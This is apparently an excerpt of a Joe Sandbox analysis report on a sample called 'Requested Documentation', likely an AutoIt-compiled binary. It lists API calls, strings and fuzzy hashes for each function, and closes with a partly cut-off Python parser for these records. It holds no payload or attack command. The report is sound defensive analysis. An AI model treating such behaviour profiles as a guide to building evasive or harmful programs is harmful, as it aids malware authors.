                                                                              • Opcode ID: e07de4ffd4859caa4594926308e72875f7cdbd8a039e61786ed825e67e7f257c
                                                                              • Instruction ID: 31e4c981b4e606ee9abbe6adf901d26c19ff87e9e300d2c04a4183562e99e634
                                                                              • Opcode Fuzzy Hash: e07de4ffd4859caa4594926308e72875f7cdbd8a039e61786ed825e67e7f257c
                                                                              • Instruction Fuzzy Hash: E6515931108204AFCB15EF64D885EAFBBE9FF89314F04491DF5559B2A2DB31E905CB52
                                                                              APIs
                                                                              • GetMenu.USER32(?), ref: 00A057FB
                                                                              • GetMenuItemCount.USER32(00000000), ref: 00A05832
                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A0585A
                                                                              • GetMenuItemID.USER32(?,?), ref: 00A058C9
                                                                              • GetSubMenu.USER32(?,?), ref: 00A058D7
                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00A05928
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                              • String ID:
                                                                              • API String ID: 650687236-0
                                                                              • Opcode ID: 5c0245829db4d57501f24595f542b71644f7280a76d69e0f5bbd662422b18392
                                                                              • Instruction ID: 69f10fc16fc0d05abd162beaa7c92275161aa10f96802d52102338ccf695349a
                                                                              • Opcode Fuzzy Hash: 5c0245829db4d57501f24595f542b71644f7280a76d69e0f5bbd662422b18392
                                                                              • Instruction Fuzzy Hash: 97513B35E00619AFCF15EFA4D845AAEB7B5EF88310F148069EC15BB391CB71AE419F90
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 009DEF06
                                                                              • VariantClear.OLEAUT32(00000013), ref: 009DEF78
                                                                              • VariantClear.OLEAUT32(00000000), ref: 009DEFD3
                                                                              • _memmove.LIBCMT ref: 009DEFFD
                                                                              • VariantClear.OLEAUT32(?), ref: 009DF04A
                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009DF078
                                                                              Similarity
                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                              • String ID:
                                                                              • API String ID: 1101466143-0
                                                                              • Opcode ID: caad373349fd783ef39006f38c7d8e9b2b4be186c955f2d47da9615913f32b85
                                                                              • Instruction ID: 2eacd3068ac8b51f068a14c2d626f13cca97ddb5af75f70ff6e49be0c3c4d7cf
                                                                              • Opcode Fuzzy Hash: caad373349fd783ef39006f38c7d8e9b2b4be186c955f2d47da9615913f32b85
                                                                              • Instruction Fuzzy Hash: 73515AB5A00209EFDB14DF58C894AAAB7B8FF4C314B15856AED59DB301E335E911CFA0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E2258
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E22A3
                                                                              • IsMenu.USER32(00000000), ref: 009E22C3
                                                                              • CreatePopupMenu.USER32 ref: 009E22F7
                                                                              • GetMenuItemCount.USER32(000000FF), ref: 009E2355
                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 009E2386
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                              • String ID:
                                                                              • API String ID: 3311875123-0
                                                                              • Opcode ID: dc60ef44725a98371d8834162b793a4399da02ac726c5eb1505145b7982e2c18
                                                                              • Instruction ID: eab89f3838325bd60c1b9ef09d2b2386f02c807f8b5adfbd4328058201a89ae7
                                                                              • Opcode Fuzzy Hash: dc60ef44725a98371d8834162b793a4399da02ac726c5eb1505145b7982e2c18
                                                                              • Instruction Fuzzy Hash: 2F51CF7060028ADFCF22CF6AC888BAEBBFDAF45714F104529E815A7291E3799D05CF51
                                                                              APIs
                                                                                • Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623
                                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0098179A
                                                                              • GetWindowRect.USER32(?,?), ref: 009817FE
                                                                              • ScreenToClient.USER32(?,?), ref: 0098181B
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0098182C
                                                                              • EndPaint.USER32(?,?), ref: 00981876
                                                                              Similarity
                                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                              • String ID:
                                                                              • API String ID: 1827037458-0
                                                                              • Opcode ID: ea4edb6b6b1e489f41c058e6e3aa5a49674d1d72bb107fd4c753e7b7e586e1d7
                                                                              • Instruction ID: 1073870bf73402558b581ac3cc748fa98f2d1e8808badc99ed9f62faf62e093e
                                                                              • Opcode Fuzzy Hash: ea4edb6b6b1e489f41c058e6e3aa5a49674d1d72bb107fd4c753e7b7e586e1d7
                                                                              • Instruction Fuzzy Hash: D241A1345047049FD710EF64CC85FBA7BECEB86724F040629F9A4872A2C7719847DB61
APIs
• ShowWindow.USER32(00A457B0,00000000,01356108,?,?,00A457B0,?,00A0B5A8,?,?), ref: 00A0B712
• EnableWindow.USER32(00000000,00000000), ref: 00A0B736
• ShowWindow.USER32(00A457B0,00000000,01356108,?,?,00A457B0,?,00A0B5A8,?,?), ref: 00A0B796
• ShowWindow.USER32(00000000,00000004,?,00A0B5A8,?,?), ref: 00A0B7A8
• EnableWindow.USER32(00000000,00000001), ref: 00A0B7CC
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 00A0B7EF
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Window$Show$Enable$MessageSend
APIs
• GetForegroundWindow.USER32(?,?,?,?,?,?,009F4E41,?,?,00000000,00000001), ref: 009F70AC
  • Part of subcall function 009F39A0: GetWindowRect.USER32(?,?), ref: 009F39B3
• GetDesktopWindow.USER32 ref: 009F70D6
• GetWindowRect.USER32(00000000), ref: 009F70DD
• mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009F710F
  • Part of subcall function 009E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC
• GetCursorPos.USER32(?), ref: 009F713B
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009F7199
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
APIs
  • Part of subcall function 009D80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009D80C0
  • Part of subcall function 009D80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009D80CA
  • Part of subcall function 009D80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009D80D9
  • Part of subcall function 009D80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009D80E0
  • Part of subcall function 009D80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009D80F6
• GetLengthSid.ADVAPI32(?,00000000,009D842F), ref: 009D88CA
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 009D88D6
• HeapAlloc.KERNEL32(00000000), ref: 009D88DD
• CopySid.ADVAPI32(00000000,00000000,?), ref: 009D88F6
• GetProcessHeap.KERNEL32(00000000,00000000,009D842F), ref: 009D890A
• HeapFree.KERNEL32(00000000), ref: 009D8911
Similarity
• API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009D85E2
• OpenProcessToken.ADVAPI32(00000000), ref: 009D85E9
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 009D85F8
• CloseHandle.KERNEL32(00000004), ref: 009D8603
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009D8632
• DestroyEnvironmentBlock.USERENV(00000000), ref: 009D8646
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
APIs
• GetDC.USER32(00000000), ref: 009DB7B5
• GetDeviceCaps.GDI32(00000000,00000058), ref: 009DB7C6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 009DB7CD
• ReleaseDC.USER32(00000000,00000000), ref: 009DB7D5
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 009DB7EC
• MulDiv.KERNEL32(000009EC,?,?), ref: 009DB7FE
Similarity
• API ID: CapsDevice$Release
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 009A0193
• MapVirtualKeyW.USER32(00000010,00000000), ref: 009A019B
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 009A01A6
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 009A01B1
• MapVirtualKeyW.USER32(00000011,00000000), ref: 009A01B9
• MapVirtualKeyW.USER32(00000012,00000000), ref: 009A01C1
Similarity
• API ID: Virtual
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 009E53F9
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 009E540F
• GetWindowThreadProcessId.USER32(?,?), ref: 009E541E
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E542D
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E5437
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 009E543E
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 009E7243
• EnterCriticalSection.KERNEL32(?,?,00990EE4,?,?), ref: 009E7254
• TerminateThread.KERNEL32(00000000,000001F6,?,00990EE4,?,?), ref: 009E7261
• WaitForSingleObject.KERNEL32(00000000,000003E8,?,00990EE4,?,?), ref: 009E726E
  • Part of subcall function 009E6C35: CloseHandle.KERNEL32(00000000,?,009E727B,?,00990EE4,?,?), ref: 009E6C3F
• InterlockedExchange.KERNEL32(?,000001F6), ref: 009E7281
• LeaveCriticalSection.KERNEL32(?,?,00990EE4,?,?), ref: 009E7288
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 009D899D
• UnloadUserProfile.USERENV(?,?), ref: 009D89A9
• CloseHandle.KERNEL32(?), ref: 009D89B2
• CloseHandle.KERNEL32(?), ref: 009D89BA
• GetProcessHeap.KERNEL32(00000000,?), ref: 009D89C3
• HeapFree.KERNEL32(00000000), ref: 009D89CA
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 009F8613
                                                                              • CharUpperBuffW.USER32(?,?), ref: 009F8722
                                                                              • VariantClear.OLEAUT32(?), ref: 009F889A
                                                                                • Part of subcall function 009E7562: VariantInit.OLEAUT32(00000000), ref: 009E75A2
                                                                                • Part of subcall function 009E7562: VariantCopy.OLEAUT32(00000000,?), ref: 009E75AB
                                                                                • Part of subcall function 009E7562: VariantClear.OLEAUT32(00000000), ref: 009E75B7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                              • API String ID: 4237274167-1221869570
                                                                              • Opcode ID: 38a62877c3dc34b691b5115e74cebb8d1f00fb2a740401e53f164e167310cfbc
                                                                              • Instruction ID: d9c74807c94d66463bc3691f3037941553e823f7853722a051f139775165fe0b
                                                                              • Opcode Fuzzy Hash: 38a62877c3dc34b691b5115e74cebb8d1f00fb2a740401e53f164e167310cfbc
                                                                              • Instruction Fuzzy Hash: E5918C706043059FC750EF24C484A6BB7E8EFC9754F14892EF99A8B361DB31E906CB92
                                                                              APIs
                                                                                • Part of subcall function 0099FC86: _wcscpy.LIBCMT ref: 0099FCA9
                                                                              • _memset.LIBCMT ref: 009E2B87
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009E2BB6
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009E2C69
                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009E2C97
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                              • String ID: 0
                                                                              • API String ID: 4152858687-4108050209
                                                                              • Opcode ID: d5cbac8840053c740f2f82f1823f4f62d86ad6e759d2b0f1614cdcf3a7c10fd0
                                                                              • Instruction ID: 9395a3d4f5cfaebbe8ca56f3e72c7213315afc4963897e17a5394e38592f06ed
                                                                              • Opcode Fuzzy Hash: d5cbac8840053c740f2f82f1823f4f62d86ad6e759d2b0f1614cdcf3a7c10fd0
                                                                              • Instruction Fuzzy Hash: DA51CB716083809BD7269F2AC845A6FB7ECAB8A310F240A69F895D6291DB60CC04D792
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009DD5D4
                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009DD60A
                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009DD61B
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009DD69D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                              • String ID: DllGetClassObject
                                                                              • API String ID: 753597075-1075368562
                                                                              • Opcode ID: bb4e88547685520a6d65b775cc45afe66db0af385d3a23d8f9efda7ccab18299
                                                                              • Instruction ID: a8f006cb7301a5490246f5ab961dab59e7d7b9d68c06415cb60b232acf205180
                                                                              • Opcode Fuzzy Hash: bb4e88547685520a6d65b775cc45afe66db0af385d3a23d8f9efda7ccab18299
                                                                              • Instruction Fuzzy Hash: 54418CB1641208EFDB15CF64C884B9ABBA9EF44314F15C1AAAD09AF305D7B1DA44CBE0
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E27C0
                                                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 009E27DC
                                                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 009E2822
                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A45890,00000000), ref: 009E286B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              • Opcode ID: 3cfd0ffa12c77debba549ff38d164145a64f39ddcb4c2bc8af85fd726d057a92
                                                                              • Instruction ID: c240869e242f9da8a114ff4ea261295b7f0ef419ce6458030d6b313a135896bd
                                                                              • Opcode Fuzzy Hash: 3cfd0ffa12c77debba549ff38d164145a64f39ddcb4c2bc8af85fd726d057a92
                                                                              • Instruction Fuzzy Hash: 8A417C702083819FD726DF26C844B1ABBECAF85314F144A6DF9A5972D2D730ED05CB52
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009FD7C5
                                                                                • Part of subcall function 0098784B: _memmove.LIBCMT ref: 00987899
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower_memmove
                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                              • API String ID: 3425801089-567219261
                                                                              • Opcode ID: fb0d623fb39ca6d4ee291c1ec2331729afec02494bed2fe2da5125152a798023
                                                                              • Instruction ID: c73b3e5d25b31936aaf263e96b28a03f91025524edca8e3b79c3a6b461f5fc70
                                                                              • Opcode Fuzzy Hash: fb0d623fb39ca6d4ee291c1ec2331729afec02494bed2fe2da5125152a798023
                                                                              • Instruction Fuzzy Hash: FD319C71904619ABCF00EF94C851ABEB7B9FF85324F108A29E825A77D1DB71AD05CB80
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009D8F14
                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009D8F27
                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 009D8F57
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_memmove$ClassName
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 365058703-1403004172
                                                                              • Opcode ID: 2e8673ff6da227801f2627bcd5b472a495ca0933d801c30ce61ad02b0f8a6855
                                                                              • Instruction ID: ddc375024500c0c25cc6de69dccd7f1233cff16963e821fda0bfbf02a0051c8d
                                                                              • Opcode Fuzzy Hash: 2e8673ff6da227801f2627bcd5b472a495ca0933d801c30ce61ad02b0f8a6855
                                                                              • Instruction Fuzzy Hash: 7C21F275A40108BEDB24ABB48C45EFFB779DF85320F50861AF421A73E2DB39480A9650
                                                                              APIs
                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009F184C
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009F1872
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009F18A2
                                                                              • InternetCloseHandle.WININET(00000000), ref: 009F18E9
                                                                                • Part of subcall function 009F2483: GetLastError.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F2498
                                                                                • Part of subcall function 009F2483: SetEvent.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F24AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                              • String ID:
                                                                              • API String ID: 3113390036-3916222277
                                                                              • Opcode ID: fc5ac0c1a8ba98fa6a5e95347320a59608e98ea6da0c131d2e1ea7b9d44b611a
                                                                              • Instruction ID: c85c9df2790bfaa4c4d43b59008ceccf86403a1caf3d09448c5f5f5d37a969a2
                                                                              • Opcode Fuzzy Hash: fc5ac0c1a8ba98fa6a5e95347320a59608e98ea6da0c131d2e1ea7b9d44b611a
                                                                              • Instruction Fuzzy Hash: EA2180B150020CBFEB119BA4DD85FBB77EDEB88784F10412AF605A6240DA649D0657A1
                                                                              APIs
                                                                                • Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
                                                                                • Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
                                                                                • Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A06461
                                                                              • LoadLibraryW.KERNEL32(?), ref: 00A06468
                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A0647D
                                                                              • DestroyWindow.USER32(?), ref: 00A06485
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 4146253029-1011021900
                                                                              • Opcode ID: e836427516977e0c8307c067838f545e6a7fbfe3622f2a46ac5825641d85aceb
                                                                              • Instruction ID: c8b4dad7cf2b617c3b076785e90f45bcc620bb007b35431bfe3fa9c3377eeaa4
                                                                              • Opcode Fuzzy Hash: e836427516977e0c8307c067838f545e6a7fbfe3622f2a46ac5825641d85aceb
                                                                              • Instruction Fuzzy Hash: 99215E71500209BFEF108FA4ED40EBB77ADEF59368F148629F920961D0D7729C629760
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 009E6DBC
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009E6DEF
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 009E6E01
                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009E6E3B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: 9617ad63d5322bf2e766b64536035cc237f247aadf50c69c420470758e51ffc5
                                                                              • Instruction ID: 4bf494a4b2076df911ebfbc0c66df93e5fc7ddd7035962139e027aae980585d2
                                                                              • Opcode Fuzzy Hash: 9617ad63d5322bf2e766b64536035cc237f247aadf50c69c420470758e51ffc5
                                                                              • Instruction Fuzzy Hash: FA21A174600249ABDB219F6ADC05B9A7BB8EFA4760F204A19FDA0D72D0D7709C518B50
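Added example, not part of the Joe Sandbox report or of its tooling: a small parser for the function records in this listing, so that the API ID, String ID, Opcode ID and fuzzy-hash fields can be filtered and cross-checked by script rather than read by eye (for instance, pulling out every function whose own code imports from WININET). It assumes only the bullet layout rendered above. SAMPLE is constructed input: two records copied from the listing, with the Associated dump lines left out.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: two function records copied from the listing above, in the
# bullet layout the report renders (Associated dump lines omitted for brevity).
SAMPLE = """\
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009F184C
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009F1872
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009F18A2
• InternetCloseHandle.WININET(00000000), ref: 009F18E9
  • Part of subcall function 009F2483: GetLastError.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F2498
  • Part of subcall function 009F2483: SetEvent.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F24AD
Strings
Memory Dump Source
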